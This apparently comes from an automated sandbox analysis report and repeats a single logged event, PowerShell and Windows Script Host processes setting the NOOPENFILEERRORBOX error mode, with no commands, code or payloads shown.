    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
